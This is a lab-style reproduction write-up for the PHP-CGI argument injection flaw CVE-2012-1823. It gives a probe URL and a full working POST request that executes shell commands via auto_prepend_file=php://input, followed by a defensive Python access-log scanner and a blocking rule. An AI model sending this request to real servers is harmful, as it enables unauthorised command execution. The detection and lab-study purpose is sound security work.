Vulnerability details
For the full details, be sure to read: https://vulhub.org/#/environments/php/CVE-2012-1823/
Affected versions
php < 5.3.12 or php < 5.4.2
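Reproducing the vulnerability
Visit http://your-ip:8080/index.php?-s
If the page's source code is returned, the vulnerability is present. We can then send the following request to execute arbitrary commands: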
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: your_ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>
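For detection, both requests above share one trait: the query string has no raw "=" (note the %3d encoding), so a CGI server splits it on "+" and passes the URL-decoded pieces to php-cgi as command-line arguments (RFC 3875 section 4.4). The following is an added example, not part of the original write-up, that flags such requests in access logs; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def cgi_args_from_query(query):
    """Return the argv a CGI server derives from the query string per
    RFC 3875 section 4.4, or [] when a raw '=' makes it an ordinary query."""
    if not query or "=" in query:
        return []
    # Split on '+' first, then URL-decode each piece (so %3d becomes '=').
    return [unquote(part) for part in query.split("+") if part]

def suspicious_args(target):
    """Return the derived argv if any element looks like a php-cgi option."""
    _, _, query = target.partition("?")
    args = cgi_args_from_query(query)
    return args if any(a.startswith("-") for a in args) else []

def scan(lines):
    """Return (line_number, method, argv) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        args = suspicious_args(m.group("target"))
        if args:
            hits.append((n, m.group("method"), args))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?-s HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "POST /index.php?-d+allow_url_include%3don'
    '+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 64',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=-s HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?about HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, method, argv in scan(SAMPLE_LOG):
        print(f"line {lineno}: {method} injects php-cgi argv {argv}")
```

The same condition (no raw "=" and a decoded piece starting with "-") can be used as a blocking rule in front of php-cgi on hosts that cannot be upgraded immediately.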